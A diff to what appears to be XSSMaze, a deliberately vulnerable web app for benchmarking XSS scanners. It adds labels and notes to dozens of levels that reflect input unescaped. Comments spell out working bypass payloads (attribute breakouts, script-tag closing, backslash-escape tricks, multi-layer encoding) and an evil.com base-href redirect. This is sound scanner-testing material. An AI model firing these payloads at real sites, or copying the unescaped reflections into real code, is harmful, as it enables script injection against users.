-Xssmaze.push("mixedmethod-level5", "/mixed-method/level5/?callback=a", "GET param 'callback' reflected raw in HTML body", "GET", ["callback"])
+Xssmaze.push("mixedmethod-level5", "/mixed-method/level5/?callback=a", "GET param 'callback' reflected raw in HTML body", "GET", ["callback"],
+  vuln: "reflected-html", delivery: ["query"])
 maze_get "/mixed-method/level5/" do |env|
   query = env.params.query["callback"]
 
@@ -50,7 +55,8 @@ end
 
 # Level 6: Param name is 'redirect_url' reflected in <a href="QUERY">
 # Bypass: javascript:alert(1)
-Xssmaze.push("mixedmethod-level6", "/mixed-method/level6/?redirect_url=a", "GET param 'redirect_url' reflected in href (javascript: protocol)", "GET", ["redirect_url"])
+Xssmaze.push("mixedmethod-level6", "/mixed-method/level6/?redirect_url=a", "GET param 'redirect_url' reflected in href (javascript: protocol)", "GET", ["redirect_url"],
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/mixed-method/level6/" do |env|
   query = env.params.query["redirect_url"]
 

--- a/src/mazes/multi_reflection_xss.cr
+++ b/src/mazes/multi_reflection_xss.cr
@@ -12,7 +12,8 @@ require "json"
 # Level 1: search query reflected 4 times, all raw
 # Contexts: <title>, <h1>, <input value=>, <meta og:title content=>.
 # Real shape: every SaaS search results page.
-Xssmaze.push("multireflect-level1", "/multireflect/level1/?q=widget", "1 param × 4 raw contexts (title/h1/input/meta)", "GET", ["q"])
+Xssmaze.push("multireflect-level1", "/multireflect/level1/?q=widget", "1 param × 4 raw contexts (title/h1/input/meta)", "GET", ["q"],
+  vuln: "reflected-html", delivery: ["query"], note: "four raw reflections — <title>, og:title content, <h1> and an input value; the <h1> is the plain HTML context")
 maze_get "/multireflect/level1/" do |env|
   q = env.params.query.fetch("q", "")
 
@@ -29,7 +30,8 @@ end
 # Real shape: dev escaped most spots but forgot the `<meta>` content.
 # The "missed one" CVE pattern — scanner must enumerate all
 # reflections to find the unsafe one.
-Xssmaze.push("multireflect-level2", "/multireflect/level2/?q=widget", "4 contexts, only <meta> content is unsafe", "GET", ["q"])
+Xssmaze.push("multireflect-level2", "/multireflect/level2/?q=widget", "4 contexts, only <meta> content is unsafe", "GET", ["q"],
+  vuln: "reflected-attr", delivery: ["query"], note: "the <title>, <h1> and input value copies are HTML-escaped; only the og:description meta content is raw, so a double-quoted attribute breakout is the only route")
 maze_get "/multireflect/level2/" do |env|
   q = env.params.query.fetch("q", "")
   safe = Xssmaze.html_escape(q)
@@ -47,7 +49,8 @@ end
 # Contexts need different payloads: body wants `<script>`,
 # JS-string wants `'-alert(1)-'`. Single-payload scanners typically
 # miss one half.
-Xssmaze.push("multireflect-level3", "/multireflect/level3/?name=guest", "body context + JS string literal", "GET", ["name"])
+Xssmaze.push("multireflect-level3", "/multireflect/level3/?name=guest", "body context + JS string literal", "GET", ["name"],
+  vuln: "reflected-html", delivery: ["query"], note: "also lands in a single-quoted JS string, which needs its own payload shape")
 maze_get "/multireflect/level3/" do |env|
   name = env.params.query.fetch("name", "guest")
 
@@ -61,7 +64,8 @@ end
 # 4 distinct contexts each requiring its own payload shape.
 # Real shape: product page reflecting product name across multiple
 # SEO/metadata spots.
-Xssmaze.push("multireflect-level4", "/multireflect/level4/?slug=demo", "href + src + body + JSON-LD multi-context", "GET", ["slug"])
+Xssmaze.push("multireflect-level4", "/multireflect/level4/?slug=demo", "href + src + body + JSON-LD multi-context", "GET", ["slug"],
+  vuln: "reflected-html", delivery: ["query"], note: "four contexts — <link href>, ld+json, <img src> and <h1>; the <h1> is the plain HTML one")
 maze_get "/multireflect/level4/" do |env|
   slug = env.params.query.fetch("slug", "demo")
 
@@ -79,7 +83,8 @@ end
 # Level 5: comment context + attribute + body
 # HTML comment `<!-- ... -->` allows breakout with `-->`. Attribute
 # uses single quotes. Body is raw. Three distinct exploit paths.
-Xssmaze.push("multireflect-level5", "/multireflect/level5/?tag=ok", "HTML comment + single-quote attr + body", "GET", ["tag"])
+Xssmaze.push("multireflect-level5", "/multireflect/level5/?tag=ok", "HTML comment + single-quote attr + body", "GET", ["tag"],
+  vuln: "reflected-html", delivery: ["query"], note: "three contexts — an HTML comment, a single-quoted class attribute and paragraph text")
 maze_get "/multireflect/level5/" do |env|
   tag = env.params.query.fetch("tag", "ok")
 
@@ -96,7 +101,8 @@ end
 # raw. Scanners that only test JSON-string-context payloads will
 # miss the body; scanners that only test body context will miss
 # the JSON path's JSON-aware escapes.
-Xssmaze.push("multireflect-level6", "/multireflect/level6/?msg=hi", "JSON-encoded script + raw body", "GET", ["msg"])
+Xssmaze.push("multireflect-level6", "/multireflect/level6/?msg=hi", "JSON-encoded script + raw body", "GET", ["msg"],
+  vuln: "reflected-html", delivery: ["query"], note: "the <script> copy is JSON-encoded and safe; the paragraph copy is raw")
 maze_get "/multireflect/level6/" do |env|
   msg = env.params.query.fetch("msg", "hi")
   json_safe = msg.to_json # produces "..." with internal escapes
@@ -111,7 +117,8 @@ end
 # Two different param names land in similar-looking spots. Scanner
 # must exercise each parameter and find that only `email` is unsafe
 # (name is escaped). Common in signup confirmation pages.
-Xssmaze.push("multireflect-level7", "/multireflect/level7/?name=Anna&email=a@b.c", "name escaped, email reflected raw", "GET", ["name", "email"])
+Xssmaze.push("multireflect-level7", "/multireflect/level7/?name=Anna&email=a@b.c", "name escaped, email reflected raw", "GET", ["name", "email"],
+  vuln: "reflected-html", delivery: ["query"], note: "name is HTML-escaped; only email is reflected raw")
 maze_get "/multireflect/level7/" do |env|
   name = Xssmaze.html_escape(env.params.query.fetch("name", ""))
   email = env.params.query.fetch("email", "")
@@ -126,7 +133,8 @@ end
 # HTML response: raw reflection. JSON response (Accept: application/json):
 # JSON-encoded. Real shape: APIs that serve dual content-types from
 # one endpoint, and only one of the response paths is XSS-safe.
-Xssmaze.push("multireflect-level8", "/multireflect/level8/?value=ok", "dual content-type response (HTML raw / JSON safe)", "GET", ["value"])
+Xssmaze.push("multireflect-level8", "/multireflect/level8/?value=ok", "dual content-type response (HTML raw / JSON safe)", "GET", ["value"],
+  vuln: "reflected-html", delivery: ["query"], note: "an Accept: application/json request gets a safely JSON-encoded response instead, so the HTML path is the vulnerable one")
 maze_get "/multireflect/level8/" do |env|
   value = env.params.query.fetch("value", "ok")
   accept = env.request.headers.fetch("Accept", "text/html")

--- a/src/mazes/multi_vector_xss.cr
+++ b/src/mazes/multi_vector_xss.cr
@@ -1,6 +1,7 @@
 # Level 1: Page has 3 forms, query reflected only in 2nd form's input value
 # Scanner needs to identify the correct reflection point among multiple forms
-Xssmaze.push("multivector-level1", "/multivector/level1/?query=a", "3 forms, reflection in 2nd form input value only")
+Xssmaze.push("multivector-level1", "/multivector/level1/?query=a", "3 forms, reflection in 2nd form input value only",
+  vuln: "reflected-attr", delivery: ["query"], note: "only the second of three forms carries the reflection, in its input value")
 maze_get "/multivector/level1/" do |env|
   query = env.params.query["query"]
 
@@ -24,7 +25,8 @@ end
 
 # Level 2: Query reflected in both script context AND HTML body
 # Two exploitable vectors on same page — scanner should find at least one
-Xssmaze.push("multivector-level2", "/multivector/level2/?query=a", "dual reflection: script var + HTML body paragraph")
+Xssmaze.push("multivector-level2", "/multivector/level2/?query=a", "dual reflection: script var + HTML body paragraph",
+  vuln: "reflected-html", delivery: ["query"], note: "also lands in a double-quoted JS string in an inline <script>")
 maze_get "/multivector/level2/" do |env|
   query = env.params.query["query"]
 
@@ -38,7 +40,8 @@ end
 
 # Level 3: Query reflected in <option value=""> inside a <select> with 10 options
 # Must break out of option/select context
-Xssmaze.push("multivector-level3", "/multivector/level3/?query=a", "reflection in option value inside select with 10 options")
+Xssmaze.push("multivector-level3", "/multivector/level3/?query=a", "reflection in option value inside select with 10 options",
+  vuln: "reflected-attr", delivery: ["query"], note: "reflected into the fourth <option value> of a ten-option <select>")
 maze_get "/multivector/level3/" do |env|
   query = env.params.query["query"]
 
@@ -62,7 +65,8 @@ end
 
 # Level 4: Page has 5 input fields, query reflected only in the 3rd field's value
 # Scanner must identify the correct injection point among many inputs
-Xssmaze.push("multivector-level4", "/multivector/level4/?query=a", "5 input fields, reflection only in 3rd field value")
+Xssmaze.push("multivector-level4", "/multivector/level4/?query=a", "5 input fields, reflection only in 3rd field value",
+  vuln: "reflected-attr", delivery: ["query"], note: "only the third of five input values carries the reflection")
 maze_get "/multivector/level4/" do |env|
   query = env.params.query["query"]
 
@@ -82,7 +86,8 @@ end
 
 # Level 5: Triple reflection — query in <title>, <meta content>, and <div>
 # All three contexts are exploitable in different ways
-Xssmaze.push("multivector-level5", "/multivector/level5/?query=a", "triple reflection: title + meta content + div body")
+Xssmaze.push("multivector-level5", "/multivector/level5/?query=a", "triple reflection: title + meta content + div body",
+  vuln: "reflected-html", delivery: ["query"], note: "three contexts — <title>, meta content and a div body")
 maze_get "/multivector/level5/" do |env|
   query = env.params.query["query"]
 
@@ -101,7 +106,8 @@ end
 
 # Level 6: Complex page structure — query buried deep in nested article>section>div>p
 # Scanner must handle deeply nested DOM to find the reflection
-Xssmaze.push("multivector-level6", "/multivector/level6/?query=a", "deep nested reflection: article > section > div > p")
+Xssmaze.push("multivector-level6", "/multivector/level6/?query=a", "deep nested reflection: article > section > div > p",
+  vuln: "reflected-html", delivery: ["query"], note: "the reflection is nested four levels deep, in article > section > div > p")
 maze_get "/multivector/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/nested_context_xss.cr
+++ b/src/mazes/nested_context_xss.cr
@@ -1,40 +1,46 @@
 # Level 1: Reflected in div title attribute with a script tag sibling - break out of title attribute
-Xssmaze.push("nestedctx-level1", "/nestedctx/level1/?query=a", "reflected in div title attribute next to script tag")
+Xssmaze.push("nestedctx-level1", "/nestedctx/level1/?query=a", "reflected in div title attribute next to script tag",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/nestedctx/level1/" do |env|
   query = env.params.query["query"]
   "<html><body><div title=\"#{query}\"><script>var a=\"safe\";</script></div></body></html>"
 end
 
 # Level 2: Reflected inside a div inside textarea - must break out of textarea first
-Xssmaze.push("nestedctx-level2", "/nestedctx/level2/?query=a", "reflected inside div inside textarea (must escape textarea)")
+Xssmaze.push("nestedctx-level2", "/nestedctx/level2/?query=a", "reflected inside div inside textarea (must escape textarea)",
+  vuln: "reflected-html", delivery: ["query"], note: "the div and its title attribute are inert text inside <textarea> RCDATA, so close </textarea> before anything can parse as markup")
 maze_get "/nestedctx/level2/" do |env|
   query = env.params.query["query"]
   "<html><body><textarea><div title=\"#{query}\"></div></textarea></body></html>"
 end
 
 # Level 3: Reflected inside a JS string that contains HTML markup - close the script tag
-Xssmaze.push("nestedctx-level3", "/nestedctx/level3/?query=a", "reflected in JS string containing HTML (close script tag)")
+Xssmaze.push("nestedctx-level3", "/nestedctx/level3/?query=a", "reflected in JS string containing HTML (close script tag)",
+  vuln: "reflected-js", delivery: ["query"], note: "the surrounding <div> markup is inside the JS string literal; break the double-quoted string or close </script>")
 maze_get "/nestedctx/level3/" do |env|
   query = env.params.query["query"]
   "<html><body><script>var a=\"<div>#{query}</div>\";</script></body></html>"
 end
 
 # Level 4: Reflected inside title element within SVG - break out of SVG title
-Xssmaze.push("nestedctx-level4", "/nestedctx/level4/?query=a", "reflected inside title element within SVG context")
+Xssmaze.push("nestedctx-level4", "/nestedctx/level4/?query=a", "reflected inside title element within SVG context",
+  vuln: "reflected-html", delivery: ["query"], note: "SVG <title> is ordinary markup in foreign content, and an injected <script> inside <svg> is an SVG script element that still runs")
 maze_get "/nestedctx/level4/" do |env|
   query = env.params.query["query"]
   "<html><body><svg><rect><title>#{query}</title></rect></svg></body></html>"
 end
 
 # Level 5: Reflected inside CSS comment within style tag - close style tag to inject
-Xssmaze.push("nestedctx-level5", "/nestedctx/level5/?query=a", "reflected inside CSS comment within style tag")
+Xssmaze.push("nestedctx-level5", "/nestedctx/level5/?query=a", "reflected inside CSS comment within style tag",
+  vuln: "reflected-html", delivery: ["query"], note: "lands inside a CSS comment; close the comment and the </style> element to reach an HTML context")
 maze_get "/nestedctx/level5/" do |env|
   query = env.params.query["query"]
   "<html><head><style>/* #{query} */body{color:red}</style></head><body><p>Content</p></body></html>"
 end
 
 # Level 6: Reflected in data-x attribute of div containing an img - break out of attribute
-Xssmaze.push("nestedctx-level6", "/nestedctx/level6/?query=a", "reflected in data attribute of div with child img element")
+Xssmaze.push("nestedctx-level6", "/nestedctx/level6/?query=a", "reflected in data attribute of div with child img element",
+  vuln: "reflected-attr", delivery: ["query"])
 maze_get "/nestedctx/level6/" do |env|
   query = env.params.query["query"]
   "<html><body><div data-x=\"#{query}\"><img src=\"safe.jpg\"></div></body></html>"

--- a/src/mazes/nonce_bypass_xss.cr
+++ b/src/mazes/nonce_bypass_xss.cr
@@ -1,7 +1,8 @@
 # Level 1: CSP with nonce, but query reflected inside a nonced <script> block (string context)
 # Exploit: Break out of the string context e.g. query=";alert(1)//
 # Since the script tag already carries the valid nonce, injected code executes
-Xssmaze.push("nonce-level1", "/nonce/level1/?query=a", "CSP nonce with reflection inside nonced script string")
+Xssmaze.push("nonce-level1", "/nonce/level1/?query=a", "CSP nonce with reflection inside nonced script string",
+  vuln: "reflected-js", delivery: ["query"], note: "the nonce is random per request, so no injected <script> can carry it; the only route is breaking the double-quoted string inside the already-nonced block")
 maze_get "/nonce/level1/" do |env|
   query = env.params.query["query"]
   nonce = Random::Secure.hex(16)
@@ -16,7 +17,8 @@ end
 # Level 2: CSP with nonce + unsafe-hashes, query reflected in onclick event handler
 # Exploit: Break out of the handler string e.g. query=');alert(1)//
 # Event handler attributes bypass nonce when unsafe-hashes is present
-Xssmaze.push("nonce-level2", "/nonce/level2/?query=a", "CSP nonce with reflection in onclick (unsafe-hashes)")
+Xssmaze.push("nonce-level2", "/nonce/level2/?query=a", "CSP nonce with reflection in onclick (unsafe-hashes)",
+  vuln: "non-xss-control", delivery: ["query"], exploitable: false, note: "script-src 'nonce-X' 'unsafe-hashes' lists no hash source, so 'unsafe-hashes' enables nothing and the onclick handler holding the reflection never runs; an injected handler or script is blocked too and the nonce is random, so nothing reaches a JS sink")
 maze_get "/nonce/level2/" do |env|
   query = env.params.query["query"]
   nonce = Random::Secure.hex(16)
@@ -34,7 +36,8 @@ end
 # Level 3: CSP script-src 'self' but query reflected in <base href="...">
 # Exploit: Change the base URL so that relative script src loads from attacker server
 # e.g. query=https://evil.com/ makes <script src="/js/app.js"> load from https://evil.com/js/app.js
-Xssmaze.push("nonce-level3", "/nonce/level3/?query=/", "CSP script-src self with base tag href injection")
+Xssmaze.push("nonce-level3", "/nonce/level3/?query=/", "CSP script-src self with base tag href injection",
+  vuln: "reflected-attr", delivery: ["query"], note: "script-src 'self' blocks inline scripts and event handlers, and also blocks the intended <base href> redirect of /js/app.js to another origin; what does work is the \" attribute breakout plus a same-origin <script src=...> include")
 maze_get "/nonce/level3/" do |env|
   query = env.params.query["query"]
   env.response.headers["Content-Security-Policy"] = "script-src 'self'"
@@ -50,7 +53,8 @@ end
 # Level 4: No CSP, reflection in <script> with single-quote string, backslash escape for quotes
 # Exploit: Send \' which becomes \\' (the backslash is escaped, leaving the quote unescaped)
 # e.g. query=\';alert(1)// => var s = '\\'';alert(1)//';
-Xssmaze.push("nonce-level4", "/nonce/level4/?query=a", "script single-quote string with backslash escape bypass")
+Xssmaze.push("nonce-level4", "/nonce/level4/?query=a", "script single-quote string with backslash escape bypass",
+  vuln: "reflected-js", delivery: ["query"], note: "single quotes are backslash-escaped but backslashes are not, so a leading backslash escapes the added one and frees the quote: \\';alert(1)//")
 maze_get "/nonce/level4/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/parser_differential_xss.cr
+++ b/src/mazes/parser_differential_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Reflection in <noscript> tag (browsers parse differently when JS enabled)
-Xssmaze.push("pdiff-level1", "/pdiff/level1/?query=a", "reflection in <noscript> tag (parser differential with JS enabled)")
+Xssmaze.push("pdiff-level1", "/pdiff/level1/?query=a", "reflection in <noscript> tag (parser differential with JS enabled)",
+  vuln: "reflected-html", delivery: ["query"], note: "with scripting enabled <noscript> content is raw text, so close </noscript> before the payload can parse")
 maze_get "/pdiff/level1/" do |env|
   query = env.params.query["query"]
 
@@ -7,7 +8,8 @@ maze_get "/pdiff/level1/" do |env|
 end
 
 # Level 2: Reflection after unclosed <select> tag
-Xssmaze.push("pdiff-level2", "/pdiff/level2/?query=a", "reflection after unclosed <select> tag")
+Xssmaze.push("pdiff-level2", "/pdiff/level2/?query=a", "reflection after unclosed <select> tag",
+  vuln: "reflected-html", delivery: ["query"], note: "inside <select> the parser drops most tags, but a <script> start tag is still processed")
 maze_get "/pdiff/level2/" do |env|
   query = env.params.query["query"]
 
@@ -15,7 +17,8 @@ maze_get "/pdiff/level2/" do |env|
 end
 
 # Level 3: Reflection inside <math> tag (MathML namespace)
-Xssmaze.push("pdiff-level3", "/pdiff/level3/?query=a", "reflection inside <math> MathML namespace")
+Xssmaze.push("pdiff-level3", "/pdiff/level3/?query=a", "reflection inside <math> MathML namespace",
+  vuln: "reflected-html", delivery: ["query"], note: "MathML foreign content: a bare <script> would be created in the MathML namespace and never run, so use an HTML breakout tag such as <img>")
 maze_get "/pdiff/level3/" do |env|
   query = env.params.query["query"]
 
@@ -23,7 +26,8 @@ maze_get "/pdiff/level3/" do |env|
 end
 
 # Level 4: Reflection after unclosed <table> row (foster parenting)
-Xssmaze.push("pdiff-level4", "/pdiff/level4/?query=a", "reflection after unclosed <table> row (foster parenting)")
+Xssmaze.push("pdiff-level4", "/pdiff/level4/?query=a", "reflection after unclosed <table> row (foster parenting)",
+  vuln: "reflected-html", delivery: ["query"], note: "despite the unclosed table the reflection is inside the <td>, an ordinary content context")
 maze_get "/pdiff/level4/" do |env|
   query = env.params.query["query"]
 
@@ -31,7 +35,8 @@ maze_get "/pdiff/level4/" do |env|
 end
 
 # Level 5: Reflection inside <xmp> tag (deprecated, preformatted content)
-Xssmaze.push("pdiff-level5", "/pdiff/level5/?query=a", "reflection inside deprecated <xmp> tag")
+Xssmaze.push("pdiff-level5", "/pdiff/level5/?query=a", "reflection inside deprecated <xmp> tag",
+  vuln: "reflected-html", delivery: ["query"], note: "<xmp> is a raw-text element; close </xmp> first")
 maze_get "/pdiff/level5/" do |env|
   query = env.params.query["query"]
 
@@ -39,7 +44,8 @@ maze_get "/pdiff/level5/" do |env|
 end
 
 # Level 6: Reflection inside <iframe srcdoc="QUERY"> (must break out of attribute)
-Xssmaze.push("pdiff-level6", "/pdiff/level6/?query=a", "reflection inside iframe srcdoc attribute")
+Xssmaze.push("pdiff-level6", "/pdiff/level6/?query=a", "reflection inside iframe srcdoc attribute",
+  vuln: "reflected-attr", sinks: ["srcdoc"], delivery: ["query"], note: "the attribute value is parsed as its own document inside the frame, so a tag payload runs without breaking the attribute")
 maze_get "/pdiff/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/payload_filter_xss.cr
+++ b/src/mazes/payload_filter_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Blocks input containing both < AND > together - reflected in input value (attr breakout, no angle brackets needed)
-Xssmaze.push("payloadfilt-level1", "/payloadfilt/level1/?query=a", "blocks < and > together, reflected in input value (attr breakout)")
+Xssmaze.push("payloadfilt-level1", "/payloadfilt/level1/?query=a", "blocks < and > together, reflected in input value (attr breakout)",
+  vuln: "reflected-attr", delivery: ["query"], note: "the request is only blocked when it contains both < and >; the reflection is in an input value, so an attribute breakout needs neither")
 maze_get "/payloadfilt/level1/" do |env|
   query = env.params.query["query"]
 
@@ -11,7 +12,8 @@ maze_get "/payloadfilt/level1/" do |env|
 end
 
 # Level 2: Blocks input containing "script" (case insensitive) - use img/svg tags instead
-Xssmaze.push("payloadfilt-level2", "/payloadfilt/level2/?query=a", "blocks 'script' keyword (case insensitive), use img/svg tags")
+Xssmaze.push("payloadfilt-level2", "/payloadfilt/level2/?query=a", "blocks 'script' keyword (case insensitive), use img/svg tags",
+  vuln: "reflected-html", delivery: ["query"], note: "requests containing \"script\" are blocked; other tags are not")
 maze_get "/payloadfilt/level2/" do |env|
   query = env.params.query["query"]
 
@@ -23,7 +25,8 @@ maze_get "/payloadfilt/level2/" do |env|
 end
 
 # Level 3: Blocks input > 80 chars AND containing < - use short payload under 80 chars
-Xssmaze.push("payloadfilt-level3", "/payloadfilt/level3/?query=a", "blocks input >80 chars with <, use short payload")
+Xssmaze.push("payloadfilt-level3", "/payloadfilt/level3/?query=a", "blocks input >80 chars with <, use short payload",
+  vuln: "reflected-html", delivery: ["query"], note: "only blocked when the value is over 80 characters *and* contains <")
 maze_get "/payloadfilt/level3/" do |env|
   query = env.params.query["query"]
 
@@ -35,7 +38,8 @@ maze_get "/payloadfilt/level3/" do |env|
 end
 
 # Level 4: Blocks alert(, confirm(, prompt( - use other JS functions like print() or top-level throw
-Xssmaze.push("payloadfilt-level4", "/payloadfilt/level4/?query=a", "blocks alert(/confirm(/prompt(, use alternative JS functions")
+Xssmaze.push("payloadfilt-level4", "/payloadfilt/level4/?query=a", "blocks alert(/confirm(/prompt(, use alternative JS functions",
+  vuln: "reflected-html", delivery: ["query"], note: "alert(, confirm( and prompt( are blocked by name; other calls are not")
 maze_get "/payloadfilt/level4/" do |env|
   query = env.params.query["query"]
 
@@ -47,7 +51,8 @@ maze_get "/payloadfilt/level4/" do |env|
 end
 
 # Level 5: Blocks input matching <\w+[\s/] (opening HTML tag pattern) - reflected in attr value, breakout needs no tag
-Xssmaze.push("payloadfilt-level5", "/payloadfilt/level5/?query=a", "blocks opening HTML tag pattern, reflected in attr (attr breakout)")
+Xssmaze.push("payloadfilt-level5", "/payloadfilt/level5/?query=a", "blocks opening HTML tag pattern, reflected in attr (attr breakout)",
+  vuln: "reflected-attr", delivery: ["query"], note: "the block pattern is <\\w+ followed by a space or slash, so <script> and </script> slip past it entirely; the reflection is in an input value")
 maze_get "/payloadfilt/level5/" do |env|
   query = env.params.query["query"]
 
@@ -59,7 +64,8 @@ maze_get "/payloadfilt/level5/" do |env|
 end
 
 # Level 6: Blocks input containing "on" followed by "=" (with any chars between) - use <script> tags (no event handlers)
-Xssmaze.push("payloadfilt-level6", "/payloadfilt/level6/?query=a", "blocks on...= pattern (event handlers), use script tags instead")
+Xssmaze.push("payloadfilt-level6", "/payloadfilt/level6/?query=a", "blocks on...= pattern (event handlers), use script tags instead",
+  vuln: "reflected-html", delivery: ["query"], note: "any on...= sequence is blocked, so use a tag that needs no event handler")
 maze_get "/payloadfilt/level6/" do |env|
   query = env.params.query["query"]
 

--- a/src/mazes/polyglot_xss.cr
+++ b/src/mazes/polyglot_xss.cr
@@ -1,4 +1,5 @@
-Xssmaze.push("polyglot-level1", "/polyglot/level1/?query=a", "HTML comment breakout")
+Xssmaze.push("polyglot-level1", "/polyglot/level1/?query=a", "HTML comment breakout",
+  vuln: "reflected-html", delivery: ["query"], note: "lands inside an HTML comment; close it with --> first")
 maze_get "/polyglot/level1/" do |env|
   query = env.params.query["query"]
 
@@ -9,7 +10,8 @@ maze_get "/polyglot/level1/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("polyglot-level2", "/polyglot/level2/?query=a", "meta refresh with URL sink")
+Xssmaze.push("polyglot-level2", "/polyglot/level2/?query=a", "meta refresh with URL sink",
+  vuln: "reflected-attr", delivery: ["query"], note: "the meta-refresh target is not a usable sink in modern browsers, which block javascript: and data: navigations; the working route is a \" breakout out of the content attribute")
 maze_get "/polyglot/level2/" do |env|
   query = env.params.query["query"]
 
@@ -21,7 +23,8 @@ maze_get "/polyglot/level2/" do |env|
   </body></html>"
 end
 
-Xssmaze.push("polyglot-level3", "/polyglot/level3/?query=a", "triple URL decode")
+Xssmaze.push("polyglot-level3", "/polyglot/level3/?query=a", "triple URL decode",
+  vuln: "reflected-html", delivery: ["query"], note: "the handler URL-decodes the already-decoded parameter three more times and rejects < after the second, so the payload needs four layers of encoding — %2525253C arrives as <")
 maze_get "/polyglot/level3/" do |env|
   data = URI.decode(env.params.query["query"])
   data = URI.decode(data)

--- a/src/mazes/post_method_xss.cr
+++ b/src/mazes/post_method_xss.cr
@@ -1,6 +1,7 @@
 # Level 1: POST body param 'query' reflected raw in response
 # Bypass: <script>alert(1)</script>
-Xssmaze.push("postmethod-level1", "/postmethod/level1/", "POST body param query reflected raw", "POST")
+Xssmaze.push("postmethod-level1", "/postmethod/level1/", "POST body param query reflected raw", "POST",
+  vuln: "reflected-html", delivery: ["body"])
 maze_get "/postmethod/level1/" do |_|
   "<html><body><form action='/postmethod/level1/' method='post'><input type='text' name='query' value='a'><input type='submit'></form></body></html>"
 end
@@ -12,7 +13,8 @@ end
 
 # Level 2: POST body param 'query' reflected in <input value="QUERY">
 # Bypass: " onfocus=alert(1) autofocus x="
-Xssmaze.push("postmethod-level2", "/postmethod/level2/", "POST body param query reflected in input value", "POST")
+Xssmaze.push("postmethod-level2", "/postmethod/level2/", "POST body param query reflected in input value", "POST",
+  vuln: "reflected-attr", delivery: ["body"])
 maze_get "/postmethod/level2/" do |_|
   "<html><body><form action='/postmethod/level2/' method='post'><input type='text' name='query' value='a'><input type='submit'></form></body></html>"
 end
@@ -24,7 +26,8 @@ end
 
 # Level 3: POST with Content-Type: application/json body {"query":"QUERY"} reflected raw
 # Bypass: <script>alert(1)</script>
-Xssmaze.push("postmethod-level3", "/postmethod/level3/", "POST JSON body query reflected raw", "POST", ["query"])
+Xssmaze.push("postmethod-level3", "/postmethod/level3/", "POST JSON body query reflected raw", "POST", ["query"],
+  vuln: "reflected-html", delivery: ["body"], note: "the body has to be JSON with Content-Type: application/json, not a form encoding")
 maze_get "/postmethod/level3/" do |_|
   "<html><body><form id='f'><input type='text' name='query' value='a'><input type='submit' onclick='send();return false;'></form>
   <script>function send(){var x=new XMLHttpRequest();x.open('POST','/postmethod/level3/');x.setRequestHeader('Content-Type','application/json;charset=UTF-8');x.send(JSON.stringify({query:document.querySelector('input[name=query]').value}));}</script></body></html>"
@@ -37,7 +40,8 @@ end
 
 # Level 4: POST body param 'query' reflected inside <script>var x = "QUERY";</script>
 # Bypass: close script tag </script><script>alert(1)</script>
-Xssmaze.push("postmethod-level4", "/postmethod/level4/", "POST body param query reflected in script variable", "POST")
+Xssmaze.push("postmethod-level4", "/postmethod/level4/", "POST body param query reflected in script variable", "POST",
+  vuln: "reflected-js", delivery: ["body"])
 maze_get "/postmethod/level4/" do |_|
   "<html><body><form action='/postmethod/level4/' method='post'><input type='text' name='query' value='a'><input type='submit'></form></body></html>"
 end
@@ -49,7 +53,8 @@ end
 
 # Level 5: POST body param 'name' reflected raw (different param name)
 # Bypass: <script>alert(1)</script>
-Xssmaze.push("postmethod-level5", "/postmethod/level5/", "POST body param name reflected raw (non-standard param)", "POST", ["name"])
+Xssmaze.push("postmethod-level5", "/postmethod/level5/", "POST body param name reflected raw (non-standard param)", "POST", ["name"],
+  vuln: "reflected-html", delivery: ["body"])
 maze_get "/postmethod/level5/" do |_|
   "<html><body><form action='/postmethod/level5/' method='post'><input type='text' name='name' value='a'><input type='submit'></form></body></html>"
 end
@@ -61,7 +66,8 @@ end
 
 # Level 6: POST body param 'query' with < > stripped but reflected in <input value="QUERY">
 # Bypass: " onfocus=alert(1) autofocus x=" (no angle brackets needed)
-Xssmaze.push("postmethod-level6", "/postmethod/level6/", "POST body param query in input value with angle bracket filter", "POST")
+Xssmaze.push("postmethod-level6", "/postmethod/level6/", "POST body param query in input value with angle bracket filter", "POST",
+  vuln: "reflected-attr", delivery: ["body"], note: "angle brackets are stripped, so break out of the input value attribute instead")
 maze_get "/postmethod/level6/" do |_|
   "<html><body><form action='/postmethod/level6/' method='post'><input type='text' name='query' value='a'><input type='submit'></form></body></html>"
 end

--- a/src/mazes/realworld_xss.cr
+++ b/src/mazes/realworld_xss.cr
@@ -1,5 +1,6 @@
 # Level 1: Double reflection - safe in comment, unsafe in body
-Xssmaze.push("realworld-level1", "/realworld/level1/?query=a", "double reflection (safe comment + unsafe body)")
+Xssmaze.push("realworld-level1", "/realworld/level1/?query=a", "double reflection (safe comment + unsafe body)",
+  vuln: "reflected-html", delivery: ["query"], note: "the HTML-comment copy has its angle brackets stripped; the <h2> copy is raw")
 maze_get "/realworld/level1/" do |env|
   query = env.params.query["query"]
   safe = Filters.strip_angles(query)
@@ -8,7 +9,8 @@ maze_get "/realworld/level1/" do |env|
 end
 
 # Level 2: Conditional reflection - only when debug=1
-Xssmaze.push("realworld-level2", "/realworld/level2/?query=a&debug=1", "conditional reflection (requires debug=1)")
+Xssmaze.push("realworld-level2", "/realworld/level2/?query=a&debug=1", "conditional reflection (requires debug=1)", "GET", ["query", "debug"],
+  vuln: "reflected-html", delivery: ["query"], note: "nothing is reflected unless the request also carries debug=1")
 maze_get "/realworld/level2/" do |env|
   query = env.params.query["query"]
   debug = env.params.query.fetch("debug", "0")
@@ -21,7 +23,8 @@ maze_get "/realworld/level2/" do |env|
 end
 
 # Level 3: Truncated reflection - 30 char limit
-Xssmaze.push("realworld-level3", "/realworld/level3/?query=a", "truncated reflection (30 char limit)")
+Xssmaze.push("realworld-level3", "/realworld/level3/?query=a", "truncated reflection (30 char limit)",
+  vuln: "reflected-html", delivery: ["query"], note: "the reflection is truncated to 30 characters")
 maze_get "/realworld/level3/" do |env|
   query = env.params.query["query"][0, 30]
 
@@ -29,7 +32,8 @@ maze_get "/realworld/level3/" do |env|
 end
 
 # Level 4: Multi-param interaction - tag + attr
-Xssmaze.push("realworld-level4", "/realworld/level4/?tag=div&attr=class=test", "multi-param XSS (tag + attr)")
+Xssmaze.push("realworld-level4", "/realworld/level4/?tag=div&attr=class=test", "multi-param XSS (tag + attr)", "GET", ["tag", "attr"],
